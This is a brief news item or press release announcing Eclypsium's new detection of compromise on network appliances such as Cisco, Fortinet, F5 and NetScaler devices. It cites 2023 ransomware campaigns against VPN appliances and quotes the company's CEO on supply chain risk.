Eclypsium’s threat detection capabilities defend network infrastructure from cybercriminals
Eclypsium launches new threat detection capabilities for network appliances to its Eclypsium supply chain security platform.
Over the past summer, ransomware groups including Akira, CACTUS, FIN8, and LockBit have been observed attacking network appliances from a number of vendors, looking to evade endpoint security and maintain persistence within target environments.
In addition, state-sponsored adversaries continue to target network devices, with the NSA and CISA recently issuing an advisory about the BlackTech group targeting network routers from multiple vendors.
“The number of remotely exploitable vulnerabilities that keep shipping in network appliances underscores weaknesses in the supply chain for enterprise IT infrastructure,” says Eclypsium CEO Yuriy Bulygin. “Defenders cannot trust these appliances to ship securely by default, but should rather anticipate and mitigate their supply chain risk. Simply scanning for vulnerabilities doesn’t do much to help overloaded security teams in preventing ransomware and other threat actors getting in through or establishing persistence in network infrastructure devices. We believe this problem has to be solved differently.”
Ransomware groups are adept at evading detection, often targeting IT infrastructure systems such as network equipment that are often opaque to security tools. These devices offer wide network access for lateral movement within the target environment and can be maliciously configured to obscure C2 communications.
So far in 2023, there have been several ransomware campaigns exploiting vulnerabilities in network infrastructure:
- In August, LockBit and Akira exploited a zero-day vulnerability on Cisco VPN appliances
- In July, FIN8 installed webshells on nearly 2,000 unpatched Citrix NetScaler devices
- In June, Akira was discovered to be exploiting flaws in Fortinet VPN appliances
- In May, CACTUS was reported to be attacking unspecified vulnerable VPN appliances
The new capabilities added to the Eclypsium supply chain security platform detect ongoing compromise of network appliances including from Cisco, F5 Networks, Fortinet, and NetScaler, with appliances from more vendors being added. Specifically, the detections look for indicators of compromise on physical and cloud (virtual) versions of network appliances, such as changes to firmware and OS binaries, modified configuration and backup files, reverse shells, and persistence modules.
These threat detection capabilities augment Eclypsium’s existing vulnerability and security posture assessment capabilities for these devices.